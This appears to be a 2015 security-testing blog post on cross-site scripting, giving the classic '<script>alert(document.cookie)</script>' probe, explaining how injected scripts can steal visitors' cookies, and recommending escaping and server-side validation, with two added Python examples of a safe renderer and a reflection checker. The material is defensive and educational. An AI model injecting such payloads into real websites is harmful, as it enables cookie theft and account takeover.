Security Testing: XSS

2015-01-28 15:57:32 / Category: Security Testing

2. Cross-site scripting (XSS)

(1) How do you test for XSS?

 

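  • First, find URLs that pass parameters, such as login pages, search pages, comment submission forms and message-posting pages.
  • Next, enter a statement such as the following (for example JavaScript, VBScript, HTML, ActiveX or Flash) into the page parameters to test:

<script>alert(document.cookie)</script>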


      Note: other XSS test strings

 

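  • Finally, when a user browses the page, an alert box pops up showing the visitor's current cookie string, which shows that the site has an XSS vulnerability.
  • Imagine that what we inject is not the simple test code above but a carefully crafted malicious script: when a user views the post, the cookie information may be obtained by the attacker, and the visitor's account can then easily be taken over by the attacker.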

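(2) How do you prevent XSS vulnerabilities?
    From the application's point of view, the following precautions are needed:

  • Escape statements or scripts such as JavaScript, VBScript, HTML, ActiveX and Flash.
  • Before the server formally processes submitted data, check its validity (the validity check covers three items: data type, data length and sensitive characters). The most fundamental fix is that the server refuses to perform any critical operation until the client's input has been confirmed valid.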
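
The two application-side measures above, as an added Python example that is not part of the original post: a comment renderer that concatenates input unchanged, beside one that validates type, length and characters on the server and escapes on output. The function names, the field names and the limits (200 characters, the nickname and page patterns) are assumptions made for this example.

```python
import html
import re

MAX_COMMENT_LEN = 200                              # assumed limit
NICKNAME_RE = re.compile(r"[A-Za-z0-9_]{1,20}")    # assumed allow-list
PAGE_RE = re.compile(r"[0-9]{1,6}")                # page number arrives as text


def render_comment_vulnerable(nickname, comment):
    """Input goes into the HTML unchanged, so markup in it becomes live."""
    return "<p><b>%s</b>: %s</p>" % (nickname, comment)


def validate(nickname, comment, page):
    """Server-side checks named in the text: type, length, sensitive characters."""
    errors = []
    if not (isinstance(page, str) and PAGE_RE.fullmatch(page)):
        errors.append("page: not an integer")
    if not (isinstance(comment, str) and 0 < len(comment) <= MAX_COMMENT_LEN):
        errors.append("comment: length out of range")
    if not (isinstance(nickname, str) and NICKNAME_RE.fullmatch(nickname)):
        errors.append("nickname: disallowed characters")
    return errors


def render_comment_safe(nickname, comment, page):
    errors = validate(nickname, comment, page)
    if errors:
        # Refuse any further processing until the input is confirmed valid.
        raise ValueError("; ".join(errors))
    # Free text may legitimately contain < or >, so it is escaped on output
    # rather than rejected: & < > " ' are written as entities.
    return "<p><b>%s</b>: %s</p>" % (
        html.escape(nickname, quote=True),
        html.escape(comment, quote=True),
    )


if __name__ == "__main__":
    probe = "<script>alert(document.cookie)</script>"   # test string from the page
    print(render_comment_vulnerable("bob", probe))
    print(render_comment_safe("bob", probe, "1"))
    print(validate("<b>bob", "x" * 500, "1;--"))
```

The comment field passes validation even when it holds the test string, which is why the escaping step on output is the part that actually neutralises it.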

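    From the tester's point of view, XSS checks are completed in two phases, requirements review and test execution:

  • During requirements review, verify the type, length and value range of each input or output item, with emphasis on verifying that HTML or script code is escaped.
  • During test execution, check the same items again.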
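
An automated counterpart to the alert-box check in (1) and to the tester's escaping check above, as an added Python example that is not part of the original post: it parses a response body and reports whether the test string came back as a live script element or as inert escaped text. The class and function names and the three sample responses are constructed for this example.

```python
from html.parser import HTMLParser

PROBE = "<script>alert(document.cookie)</script>"   # test string from the page
PROBE_JS = "alert(document.cookie)"                 # what runs if it is not escaped


class ProbeFinder(HTMLParser):
    """Records how the test string appears once the response is parsed as HTML."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_script = False
        self.executed = False    # parsed as a real <script> element
        self.as_text = False     # present only as text, i.e. it was escaped

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Entities are already decoded here, so escaped output shows up
        # as ordinary text that contains the whole test string.
        if self.in_script and PROBE_JS in data:
            self.executed = True
        elif not self.in_script and PROBE in data:
            self.as_text = True


def check_reflection(body):
    finder = ProbeFinder()
    finder.feed(body)
    finder.close()               # flush any buffered text
    if finder.executed:
        return "vulnerable"
    return "escaped" if finder.as_text else "not reflected"


# Constructed sample responses for a search page that echoes its query.
RAW = "<html><body><p>Results for: " + PROBE + "</p></body></html>"
ESCAPED = ("<html><body><p>Results for: &lt;script&gt;alert(document.cookie)"
           "&lt;/script&gt;</p></body></html>")
NONE = "<html><body><p>No results</p></body></html>"

if __name__ == "__main__":
    for name, body in (("raw", RAW), ("escaped", ESCAPED), ("none", NONE)):
        print(name, "->", check_reflection(body))
```

A page whose own scripts already contain `alert(document.cookie)` would be reported as vulnerable, so a unique marker inside the test string makes the check more reliable.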
